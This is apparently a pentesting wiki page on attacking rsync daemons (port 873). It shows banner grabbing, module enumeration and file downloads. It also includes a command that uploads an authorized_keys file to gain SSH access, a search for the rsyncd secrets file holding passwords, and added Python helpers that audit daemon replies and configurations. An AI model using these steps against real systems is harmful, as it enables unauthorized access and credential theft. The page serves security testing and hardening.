# 873 - Pentesting Rsync
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## **Basic Information**
From [wikipedia](https://en.wikipedia.org/wiki/Rsync):
> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
**Default port:** 873
```
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
```
## Enumeration
### Banner & Manual Communication
```bash
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the server to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Server closes the connection
# Now let's try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
```
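The exchange above can be turned into a repeatable check of a daemon you administer. This is an added example, not code from the original page: `parse_daemon_reply` and `query_daemon` are hypothetical helper names, the `open`/`listed`/`auth_required` labels are this example's own, and a reply of `@RSYNCD: OK` is treated as a module that is served without a password.

```python
import socket

def parse_daemon_reply(raw: bytes) -> dict:
    """Classify the lines an rsync daemon sends back after a '#list' or module request."""
    out = {"version": None, "status": "unknown", "modules": [], "detail": None}
    for line in raw.decode("utf-8", "replace").splitlines():
        if line.startswith("@RSYNCD: "):
            word, _, rest = line[len("@RSYNCD: "):].strip().partition(" ")
            if word == "OK":                 # module served with no password at all
                out["status"] = "open"
                break
            if word == "AUTHREQD":           # rest is the per-connection challenge
                out["status"], out["detail"] = "auth_required", rest.strip() or None
                break
            if word == "EXIT":               # end of a module listing
                out["status"] = "listed"
                break
            if out["version"] is None:       # greeting, e.g. "31.0"
                out["version"] = word
        elif line.startswith("@ERROR"):
            out["status"], out["detail"] = "error", line.partition(":")[2].strip()
            break
        elif line.strip():
            # Listing entry "name<TAB>comment"; a configured MOTD would also land here.
            out["modules"].append(line.split("\t", 1)[0].strip())
    return out

def query_daemon(host: str, port: int = 873, request: str = "#list", timeout: float = 5.0) -> dict:
    """Run the exchange from the transcript against a daemon you administer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        stream = sock.makefile("rwb")
        raw = stream.readline()                           # server greeting
        stream.write(raw + request.encode() + b"\n")      # echo it, then the request line
        stream.flush()
        for line in stream:
            raw += line
            if line.startswith((b"@RSYNCD: ", b"@ERROR")):
                break                                     # OK / AUTHREQD / EXIT / error
    return parse_daemon_reply(raw)

# Replies taken from the transcript above, plus one constructed "open" reply.
LISTING = b"@RSYNCD: 31.0\nraidroot\nUSBCopy\nNAS_Public\n_NAS_Recycle_TOSRAID\n@RSYNCD: EXIT\n"
AUTH = b"@RSYNCD: 31.0\n@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g\n"
OPEN = b"@RSYNCD: 31.0\n@RSYNCD: OK\n"  # constructed

if __name__ == "__main__":
    for sample in (LISTING, AUTH, OPEN):
        print(parse_daemon_reply(sample))
```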
### **Enumerating Shared Folders**
**Rsync modules** are directory shares that **may be protected with passwords**. To identify the available modules and check whether they require a password, use the following commands:
```bash
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```
Some shares may not appear in the list, which may mean they are hidden. In addition, access to some shares may be restricted to specific **credentials**, which is indicated by an **"Access Denied"** message.
### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsync)
### Manual Rsync Usage
After obtaining the **module list**, the next steps depend on whether authentication is required. Without authentication, **listing** a shared folder and **copying** its files to a local directory is done as follows:
```bash
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```
This process **transfers files recursively**, preserving their attributes and permissions.
With **credentials**, you can list and download from a shared folder as follows; a password prompt will appear:
```bash
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
```
To **upload content**, such as an _**authorized_keys**_ file for access, use:
```bash
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
```
## POST
To locate the rsyncd configuration file, run:
```bash
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```
Within this file, the _secrets file_ parameter may point to a file containing the **usernames and passwords** used for rsyncd authentication.
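The same configuration file decides which modules are hidden, which require credentials and which accept uploads, so it can be reviewed directly. The following is an added example, not part of the original page: it reads an `rsyncd.conf` using the documented parameters `auth users`, `secrets file`, `read only`, `list` and `hosts allow`, and the finding labels, function names and sample configuration are this example's own. It assumes no line continuations or include directives.

```python
import re

# rsyncd defaults: modules are listed, read-only, anonymous and reachable from any host.
DEFAULTS = {"authusers": "", "secretsfile": "", "readonly": "yes", "list": "yes", "hostsallow": ""}
TRUE = {"yes", "true", "1"}

def parse_rsyncd_conf(text):
    """Return (globals, {module: params}); whitespace in parameter names is ignored, as rsyncd does."""
    glob, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            current = modules.setdefault(header.group(1).strip(), {})
            continue
        name, sep, value = line.partition("=")
        if sep:
            key = re.sub(r"\s+", "", name).lower()
            (glob if current is None else current)[key] = value.strip()
    return glob, modules

def audit(text):
    """Map each module to a list of finding labels (labels are this example's own)."""
    glob, modules = parse_rsyncd_conf(text)
    findings = {}
    for module, params in modules.items():
        eff = {**DEFAULTS, **glob, **params}       # module settings override globals
        anonymous = not eff["authusers"]
        writable = eff["readonly"].lower() not in TRUE
        issues = []
        if anonymous:
            issues.append("anonymous-write" if writable else "anonymous-read")
        elif not eff["secretsfile"]:
            issues.append("auth-without-secrets-file")
        if not eff["hostsallow"]:
            issues.append("any-host")
        if anonymous and eff["list"].lower() not in TRUE:
            issues.append("hidden-not-protected")  # list = no only hides the name
        findings[module] = issues
    return findings

# Constructed sample configuration, not taken from a real host.
SAMPLE_CONF = ("secrets file = /etc/rsyncd.secrets\n[public]\nhosts allow = 10.0.0.0/8\n"
               "[backup]\nauth users = backup\nread only = no\nhosts allow = 10.0.0.5\n"
               "[home_user]\nread only = false\nlist = no\n")

if __name__ == "__main__":
    print(audit(SAMPLE_CONF))
```

A module flagged `anonymous-write` is the case in which the upload shown earlier succeeds without a password; setting `auth users` together with a `secrets file`, and restricting `hosts allow`, closes it.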
## References
* [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)